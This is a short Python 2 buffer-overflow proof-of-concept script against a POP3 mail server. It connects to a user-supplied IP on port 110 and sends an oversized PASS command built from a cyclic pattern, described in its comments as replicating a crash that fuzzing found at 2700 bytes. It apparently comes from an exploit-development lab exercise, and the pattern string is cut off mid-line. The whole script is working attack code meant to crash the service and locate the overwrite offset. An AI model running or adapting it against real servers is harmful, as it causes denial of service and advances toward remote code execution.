#!/usr/bin/python

# After running the fuzzer against the application,
# A BoF condition was identified after transmitting a password length of 2700 bytes.
# Therefore, we replicate the crash directly through the following script:

# Import sockets

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Supply target IP
targetIP = raw_input('Enter IP associated w/ POP3 target: ')

# Set buffer to that which was identified to result in crashing the program's execution flow
buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah$

# Execution
try:
        print "\nSending evil buffer..."
        s.connect((targetIP, 110))
        data = s.recv(1024)
        s.send('USER username' + '\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        print '\nSuccess!'
except:
        print 'FAIL: Could not connect to POP3.'

#EOF